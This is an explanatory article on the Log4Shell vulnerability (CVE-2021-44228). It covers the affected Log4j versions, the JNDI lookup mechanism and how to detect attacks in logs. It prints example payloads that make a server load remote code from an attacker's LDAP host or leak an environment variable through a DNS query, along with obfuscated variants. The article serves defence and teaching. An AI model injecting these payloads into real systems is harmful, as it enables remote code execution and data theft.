Log4Shell
The Log4Shell vulnerability, tracked as CVE-2021-44228, was reported to the Apache Log4j team on November 24, 2021 by security researcher Chen Zhaojun of the Alibaba Cloud Security Team and became public on December 10, 2021. It affects Log4j 2 (versions 2.0-beta9 through 2.14.1), the Java library that other software uses to log events, for example to record every request made to a website. The older Log4j 1.x branch is not affected by this CVE.
Why is it so critical?
Log4j is one of the most widely used Java logging libraries, and products or services from Apple, Twitter, Steam, Baidu, Amazon, Tesla, Minecraft, Google, LinkedIn and many others were reported as exposed. The flaw was given a CVSS score of 10.0, the highest possible score: it can be exploited over the network, without authentication, and gives the attacker arbitrary code execution on the server.
Let's take an example: you own a connected home. From the outside, everything looks perfect. An attacker stands in front of your house without the keys, shouts "open up" at the door, and it opens...
For more: List of affected software
What is it about?
The Log4Shell flaw abuses Log4j's message lookup substitution together with the Java Naming and Directory Interface (JNDI). JNDI is a Java API for looking up objects in naming and directory services, including LDAP directories. Exploiting CVE-2021-44228 consists of injecting a payload of the form ${jndi:...} into any attacker-controlled string that ends up being logged (an HTTP User-Agent header, a username, a chat message). A vulnerable Log4j evaluates the lookup itself: it connects to the server named in the payload, over LDAP, RMI or DNS, and in the LDAP and RMI cases loads and executes the Java class that the attacker's server returns.
Exploitation
CVE-2021-44228 can be exploited with payloads of the following forms. The first one makes the target fetch and execute code from an attacker-controlled LDAP server; the second only triggers a DNS query to the attacker's name server, which is enough to confirm that a host is vulnerable; the third nests a second lookup inside the host name so that the value of an environment variable is exfiltrated in the DNS query itself:
${jndi:ldap://server_pirate/malicious_message}
${jndi:dns://server_dns/entry_dns}
${jndi:dns://server_dns/${env:user}}
For more: Log4Shell: 0-day found in log4j 2, a popular Java logging package
Did an attacker break into my system?
The first thing to do is to search your logs for the lookup string, for example in the syslog files of a Debian-style host (zgrep reads both plain and gzip-compressed files). Also search the logs of the Java applications themselves and of the web servers in front of them, because that is where the injected header or parameter is actually written. Keep in mind that a plain search for "jndi" misses obfuscated payloads such as ${${lower:j}ndi:...} or ${j${::-n}di:...}, which Log4j resolves to the same thing:
$ zgrep -i "jndi" /var/log/syslog
$ zgrep -i "jndi" /var/log/syslog.1
$ zgrep -i "jndi" /var/log/syslog.2.gz
For more: log4j Exploitation Detection